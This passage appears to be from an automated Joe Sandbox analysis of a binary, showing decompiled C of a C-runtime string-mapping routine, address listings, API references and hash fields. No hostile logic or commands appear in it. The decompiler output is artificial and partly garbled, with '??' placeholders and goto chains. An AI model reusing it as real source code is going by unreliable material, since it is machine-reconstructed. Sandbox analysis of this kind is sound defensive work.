                                                                                                                                                                                                        				_t194 =  *0x423e7c; // 0x1
                                                                                                                                                                                                        				if(_t194 == 0) {
                                                                                                                                                                                                        					_t182 = 1;
                                                                                                                                                                                                        					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                                                                                                                        						_t162 = GetLastError();
                                                                                                                                                                                                        						__eflags = _t162 - 0x78;
                                                                                                                                                                                                        						if(_t162 == 0x78) {
                                                                                                                                                                                                        							 *0x423e7c = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						 *0x423e7c = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a16 <= 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					_t112 =  *0x423e7c; // 0x1
                                                                                                                                                                                                        					if(_t112 == 2 || _t112 == 0) {
                                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                        						__eflags = _a4;
                                                                                                                                                                                                        						if(_a4 == 0) {
                                                                                                                                                                                                        							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _a28;
                                                                                                                                                                                                        						if(_a28 == 0) {
                                                                                                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                                                                                                                                                        						_v24 = _t113;
                                                                                                                                                                                                        						__eflags = _t113 - 0xffffffff;
                                                                                                                                                                                                        						if(_t113 != 0xffffffff) {
                                                                                                                                                                                                        							__eflags = _t113 - _a28;
                                                                                                                                                                                                        							if(_t113 == _a28) {
                                                                                                                                                                                                        								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                                                                                                        								L78:
                                                                                                                                                                                                        								__eflags = _v16;
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									_push(_v16);
                                                                                                                                                                                                        									E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t115 = _v20;
                                                                                                                                                                                                        								__eflags = _t115;
                                                                                                                                                                                                        								if(_t115 != 0) {
                                                                                                                                                                                                        									__eflags = _a20 - _t115;
                                                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                                                        										_push(_t115);
                                                                                                                                                                                                        										E0040B6B5(0, _t182, _t184, __eflags);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t116 = _t184;
                                                                                                                                                                                                        								goto L84;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                                                                                                                        							_t191 =  &(_t189[0xc]);
                                                                                                                                                                                                        							_v16 = _t120;
                                                                                                                                                                                                        							__eflags = _t120;
                                                                                                                                                                                                        							if(_t120 == 0) {
                                                                                                                                                                                                        								goto L58;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                                                                                                                        							_v12 = _t121;
                                                                                                                                                                                                        							__eflags = _t121;
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									L71:
                                                                                                                                                                                                        									_t182 = 0;
                                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                                        									L72:
                                                                                                                                                                                                        									__eflags = _t182;
                                                                                                                                                                                                        									if(_t182 == 0) {
                                                                                                                                                                                                        										goto L62;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E0040BA30(_t182, _t182, 0, _v12);
                                                                                                                                                                                                        									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                                                                                                                        									_v12 = _t123;
                                                                                                                                                                                                        									__eflags = _t123;
                                                                                                                                                                                                        									if(_t123 != 0) {
                                                                                                                                                                                                        										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                                                                                                                        										_v20 = _t186;
                                                                                                                                                                                                        										asm("sbb esi, esi");
                                                                                                                                                                                                        										_t184 =  ~_t186 & _v12;
                                                                                                                                                                                                        										__eflags = _t184;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t184 = 0;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E004147AE(_t182);
                                                                                                                                                                                                        									goto L78;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t121 - 0xffffffe0;
                                                                                                                                                                                                        								if(_t121 > 0xffffffe0) {
                                                                                                                                                                                                        									goto L71;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t127 =  &(_t121[4]);
                                                                                                                                                                                                        								__eflags = _t127 - 0x400;
                                                                                                                                                                                                        								if(_t127 > 0x400) {
                                                                                                                                                                                                        									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                                                                                                                                                        									__eflags = _t128;
                                                                                                                                                                                                        									if(_t128 != 0) {
                                                                                                                                                                                                        										 *_t128 = 0xdddd;
                                                                                                                                                                                                        										_t128 = _t128 + 8;
                                                                                                                                                                                                        										__eflags = _t128;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t182 = _t128;
                                                                                                                                                                                                        									goto L72;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E0040CFB0(_t127);
                                                                                                                                                                                                        								_t182 = _t191;
                                                                                                                                                                                                        								__eflags = _t182;
                                                                                                                                                                                                        								if(_t182 == 0) {
                                                                                                                                                                                                        									goto L62;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *_t182 = 0xcccc;
                                                                                                                                                                                                        								_t182 = _t182 + 8;
                                                                                                                                                                                                        								goto L72;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L62:
                                                                                                                                                                                                        							_t184 = 0;
                                                                                                                                                                                                        							goto L78;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L58;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t112 != 1) {
                                                                                                                                                                                                        							L58:
                                                                                                                                                                                                        							_t116 = 0;
                                                                                                                                                                                                        							L84:
                                                                                                                                                                                                        							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                                        						if(_a28 == 0) {
                                                                                                                                                                                                        							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t184 = MultiByteToWideChar;
                                                                                                                                                                                                        						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                                                                                                                        						_t207 = _t182;
                                                                                                                                                                                                        						if(_t207 == 0) {
                                                                                                                                                                                                        							goto L58;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(_t207 <= 0) {
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								_v16 = 0;
                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                        								if(_v16 == 0) {
                                                                                                                                                                                                        									goto L58;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                                                                                                                        									L52:
                                                                                                                                                                                                        									E004147AE(_v16);
                                                                                                                                                                                                        									_t116 = _v12;
                                                                                                                                                                                                        									goto L84;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t184 = LCMapStringW;
                                                                                                                                                                                                        								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                                                                                                                        								_v12 = _t174;
                                                                                                                                                                                                        								if(_t174 == 0) {
                                                                                                                                                                                                        									goto L52;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if((_a8 & 0x00000400) == 0) {
                                                                                                                                                                                                        									__eflags = _t174;
                                                                                                                                                                                                        									if(_t174 <= 0) {
                                                                                                                                                                                                        										L44:
                                                                                                                                                                                                        										_t184 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										L45:
                                                                                                                                                                                                        										__eflags = _t184;
                                                                                                                                                                                                        										if(_t184 != 0) {
                                                                                                                                                                                                        											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                        											__eflags = _t141;
                                                                                                                                                                                                        											if(_t141 != 0) {
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												__eflags = _a24;
                                                                                                                                                                                                        												if(_a24 != 0) {
                                                                                                                                                                                                        													_push(_a24);
                                                                                                                                                                                                        													_push(_a20);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        													_push(0);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											E004147AE(_t184);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L52;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t144 = 0xffffffe0;
                                                                                                                                                                                                        									_t179 = _t144 % _t174;
                                                                                                                                                                                                        									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                        									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                        									_t146 = _t174 + _t52;
                                                                                                                                                                                                        									__eflags = _t146 - 0x400;
                                                                                                                                                                                                        									if(_t146 > 0x400) {
                                                                                                                                                                                                        										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                        										__eflags = _t147;
                                                                                                                                                                                                        										if(_t147 != 0) {
                                                                                                                                                                                                        											 *_t147 = 0xdddd;
                                                                                                                                                                                                        											_t147 =  &(_t147[4]);
                                                                                                                                                                                                        											__eflags = _t147;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t184 = _t147;
                                                                                                                                                                                                        										goto L45;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									E0040CFB0(_t146);
                                                                                                                                                                                                        									_t184 = _t189;
                                                                                                                                                                                                        									__eflags = _t184;
                                                                                                                                                                                                        									if(_t184 == 0) {
                                                                                                                                                                                                        										goto L52;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *_t184 = 0xcccc;
                                                                                                                                                                                                        									_t184 =  &(_t184[4]);
                                                                                                                                                                                                        									goto L45;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                        									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L52;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t150 = 0xffffffe0;
                                                                                                                                                                                                        							_t179 = _t150 % _t182;
                                                                                                                                                                                                        							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                        							_t152 = _t182 + _t25;
                                                                                                                                                                                                        							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                        								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                        								__eflags = _t153;
                                                                                                                                                                                                        								if(_t153 == 0) {
                                                                                                                                                                                                        									L27:
                                                                                                                                                                                                        									_v16 = _t153;
                                                                                                                                                                                                        									goto L29;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *_t153 = 0xdddd;
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								_t153 =  &(_t153[4]);
                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							E0040CFB0(_t152);
                                                                                                                                                                                                        							_t153 = _t189;
                                                                                                                                                                                                        							if(_t153 == 0) {
                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *_t153 = 0xcccc;
                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t178 = _a16;
                                                                                                                                                                                                        				_t157 = _a12;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t178 = _t178 - 1;
                                                                                                                                                                                                        					if( *_t157 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t157 =  &(_t157[1]);
                                                                                                                                                                                                        					if(_t178 != 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                        				if(_t160 < _a16) {
                                                                                                                                                                                                        					_t160 = _t160 + 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_a16 = _t160;
                                                                                                                                                                                                        				goto L13;
                                                                                                                                                                                                        			}











































                                                                                                                                                                                                        0x00417089
                                                                                                                                                                                                        0x00417090
                                                                                                                                                                                                        0x00417098
                                                                                                                                                                                                        0x0041709a
                                                                                                                                                                                                        0x004170a0
                                                                                                                                                                                                        0x004170a6
                                                                                                                                                                                                        0x004170bb
                                                                                                                                                                                                        0x004170c5
                                                                                                                                                                                                        0x004170cb
                                                                                                                                                                                                        0x004170ce
                                                                                                                                                                                                        0x004170d0
                                                                                                                                                                                                        0x004170d0
                                                                                                                                                                                                        0x004170bd
                                                                                                                                                                                                        0x004170bd
                                                                                                                                                                                                        0x004170bd
                                                                                                                                                                                                        0x004170bb
                                                                                                                                                                                                        0x004170dd
                                                                                                                                                                                                        0x00417101
                                                                                                                                                                                                        0x00417101
                                                                                                                                                                                                        0x00417109
                                                                                                                                                                                                        0x004172bb
                                                                                                                                                                                                        0x004172be
                                                                                                                                                                                                        0x004172c1
                                                                                                                                                                                                        0x004172c4
                                                                                                                                                                                                        0x004172cb
                                                                                                                                                                                                        0x004172cb
                                                                                                                                                                                                        0x004172ce
                                                                                                                                                                                                        0x004172d1
                                                                                                                                                                                                        0x004172d8
                                                                                                                                                                                                        0x004172d8
                                                                                                                                                                                                        0x004172de
                                                                                                                                                                                                        0x004172e4
                                                                                                                                                                                                        0x004172e7
                                                                                                                                                                                                        0x004172ea
                                                                                                                                                                                                        0x004172f3
                                                                                                                                                                                                        0x004172f6
                                                                                                                                                                                                        0x004173ef
                                                                                                                                                                                                        0x004173f1
                                                                                                                                                                                                        0x004173f1
                                                                                                                                                                                                        0x004173f4
                                                                                                                                                                                                        0x004173f6
                                                                                                                                                                                                        0x004173f9
                                                                                                                                                                                                        0x004173fe
                                                                                                                                                                                                        0x004173ff
                                                                                                                                                                                                        0x00417402
                                                                                                                                                                                                        0x00417404
                                                                                                                                                                                                        0x00417406
                                                                                                                                                                                                        0x00417409
                                                                                                                                                                                                        0x0041740b
                                                                                                                                                                                                        0x0041740c
                                                                                                                                                                                                        0x00417411
                                                                                                                                                                                                        0x00417409
                                                                                                                                                                                                        0x00417412
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417412
                                                                                                                                                                                                        0x00417309
                                                                                                                                                                                                        0x0041730e
                                                                                                                                                                                                        0x00417311
                                                                                                                                                                                                        0x00417314
                                                                                                                                                                                                        0x00417316
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041732a
                                                                                                                                                                                                        0x0041732c
                                                                                                                                                                                                        0x0041732f
                                                                                                                                                                                                        0x00417331
                                                                                                                                                                                                        0x0041733a
                                                                                                                                                                                                        0x00417379
                                                                                                                                                                                                        0x00417379
                                                                                                                                                                                                        0x00417379
                                                                                                                                                                                                        0x0041737b
                                                                                                                                                                                                        0x0041737b
                                                                                                                                                                                                        0x0041737d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417384
                                                                                                                                                                                                        0x0041739c
                                                                                                                                                                                                        0x0041739e
                                                                                                                                                                                                        0x004173a1
                                                                                                                                                                                                        0x004173a3
                                                                                                                                                                                                        0x004173bf
                                                                                                                                                                                                        0x004173c1
                                                                                                                                                                                                        0x004173c9
                                                                                                                                                                                                        0x004173cb
                                                                                                                                                                                                        0x004173cb
                                                                                                                                                                                                        0x004173a5
                                                                                                                                                                                                        0x004173a5
                                                                                                                                                                                                        0x004173a5
                                                                                                                                                                                                        0x004173cf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004173d4
                                                                                                                                                                                                        0x0041733c
                                                                                                                                                                                                        0x0041733f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417341
                                                                                                                                                                                                        0x00417344
                                                                                                                                                                                                        0x00417349
                                                                                                                                                                                                        0x00417362
                                                                                                                                                                                                        0x00417368
                                                                                                                                                                                                        0x0041736a
                                                                                                                                                                                                        0x0041736c
                                                                                                                                                                                                        0x00417372
                                                                                                                                                                                                        0x00417372
                                                                                                                                                                                                        0x00417372
                                                                                                                                                                                                        0x00417375
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417375
                                                                                                                                                                                                        0x0041734b
                                                                                                                                                                                                        0x00417350
                                                                                                                                                                                                        0x00417352
                                                                                                                                                                                                        0x00417354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417356
                                                                                                                                                                                                        0x0041735c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041735c
                                                                                                                                                                                                        0x00417333
                                                                                                                                                                                                        0x00417333
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417117
                                                                                                                                                                                                        0x0041711a
                                                                                                                                                                                                        0x004172ec
                                                                                                                                                                                                        0x004172ec
                                                                                                                                                                                                        0x00417414
                                                                                                                                                                                                        0x00417425
                                                                                                                                                                                                        0x00417425
                                                                                                                                                                                                        0x00417120
                                                                                                                                                                                                        0x00417126
                                                                                                                                                                                                        0x0041712d
                                                                                                                                                                                                        0x0041712d
                                                                                                                                                                                                        0x00417130
                                                                                                                                                                                                        0x00417153
                                                                                                                                                                                                        0x00417155
                                                                                                                                                                                                        0x00417157
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041715d
                                                                                                                                                                                                        0x0041715d
                                                                                                                                                                                                        0x004171a2
                                                                                                                                                                                                        0x004171a2
                                                                                                                                                                                                        0x004171a5
                                                                                                                                                                                                        0x004171a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004171c1
                                                                                                                                                                                                        0x004172aa
                                                                                                                                                                                                        0x004172ad
                                                                                                                                                                                                        0x004172b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004172b5
                                                                                                                                                                                                        0x004171c7
                                                                                                                                                                                                        0x004171db
                                                                                                                                                                                                        0x004171dd
                                                                                                                                                                                                        0x004171e2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004171ef
                                                                                                                                                                                                        0x0041721a
                                                                                                                                                                                                        0x0041721c
                                                                                                                                                                                                        0x00417263
                                                                                                                                                                                                        0x00417263
                                                                                                                                                                                                        0x00417263
                                                                                                                                                                                                        0x00417265
                                                                                                                                                                                                        0x00417265
                                                                                                                                                                                                        0x00417267
                                                                                                                                                                                                        0x00417277
                                                                                                                                                                                                        0x0041727d
                                                                                                                                                                                                        0x0041727f
                                                                                                                                                                                                        0x00417281
                                                                                                                                                                                                        0x00417282
                                                                                                                                                                                                        0x00417283
                                                                                                                                                                                                        0x00417286
                                                                                                                                                                                                        0x0041728c
                                                                                                                                                                                                        0x0041728f
                                                                                                                                                                                                        0x00417288
                                                                                                                                                                                                        0x00417288
                                                                                                                                                                                                        0x00417289
                                                                                                                                                                                                        0x00417289
                                                                                                                                                                                                        0x004172a0
                                                                                                                                                                                                        0x004172a0
                                                                                                                                                                                                        0x004172a4
                                                                                                                                                                                                        0x004172a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417267
                                                                                                                                                                                                        0x00417222
                                                                                                                                                                                                        0x00417223
                                                                                                                                                                                                        0x00417225
                                                                                                                                                                                                        0x00417228
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041722a
                                                                                                                                                                                                        0x0041722a
                                                                                                                                                                                                        0x0041722e
                                                                                                                                                                                                        0x00417233
                                                                                                                                                                                                        0x0041724c
                                                                                                                                                                                                        0x00417252
                                                                                                                                                                                                        0x00417254
                                                                                                                                                                                                        0x00417256
                                                                                                                                                                                                        0x0041725c
                                                                                                                                                                                                        0x0041725c
                                                                                                                                                                                                        0x0041725c
                                                                                                                                                                                                        0x0041725f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041725f
                                                                                                                                                                                                        0x00417235
                                                                                                                                                                                                        0x0041723a
                                                                                                                                                                                                        0x0041723c
                                                                                                                                                                                                        0x0041723e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417240
                                                                                                                                                                                                        0x00417246
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417246
                                                                                                                                                                                                        0x004171f4
                                                                                                                                                                                                        0x00417213
                                                                                                                                                                                                        0x00417213
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004171f4
                                                                                                                                                                                                        0x00417163
                                                                                                                                                                                                        0x00417164
                                                                                                                                                                                                        0x00417169
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041716b
                                                                                                                                                                                                        0x0041716b
                                                                                                                                                                                                        0x00417174
                                                                                                                                                                                                        0x0041718a
                                                                                                                                                                                                        0x00417190
                                                                                                                                                                                                        0x00417192
                                                                                                                                                                                                        0x0041719d
                                                                                                                                                                                                        0x0041719d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041719d
                                                                                                                                                                                                        0x00417194
                                                                                                                                                                                                        0x0041719a
                                                                                                                                                                                                        0x0041719a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041719a
                                                                                                                                                                                                        0x00417176
                                                                                                                                                                                                        0x0041717b
                                                                                                                                                                                                        0x0041717f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417181
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00417181
                                                                                                                                                                                                        0x00417157
                                                                                                                                                                                                        0x00417109
                                                                                                                                                                                                        0x004170df
                                                                                                                                                                                                        0x004170e2
                                                                                                                                                                                                        0x004170e5
                                                                                                                                                                                                        0x004170e5
                                                                                                                                                                                                        0x004170e8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004170ea
                                                                                                                                                                                                        0x004170ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004170ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004170ef
                                                                                                                                                                                                        0x004170f7
                                                                                                                                                                                                        0x004170fb
                                                                                                                                                                                                        0x004170fd
                                                                                                                                                                                                        0x004170fd
                                                                                                                                                                                                        0x004170fe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,021A18B0), ref: 004170C5
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3809854901-0
                                                                                                                                                                                                        • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                        			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                        				char* _t60;
                                                                                                                                                                                                        				char _t62;
                                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                                        				char _t64;
                                                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                        				intOrPtr _t69;
                                                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                                                        				intOrPtr _t74;
                                                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                                                        				intOrPtr* _t83;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				char* _t88;
                                                                                                                                                                                                        				char* _t89;
                                                                                                                                                                                                        				intOrPtr* _t91;
                                                                                                                                                                                                        				intOrPtr* _t93;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                        				void* _t103;
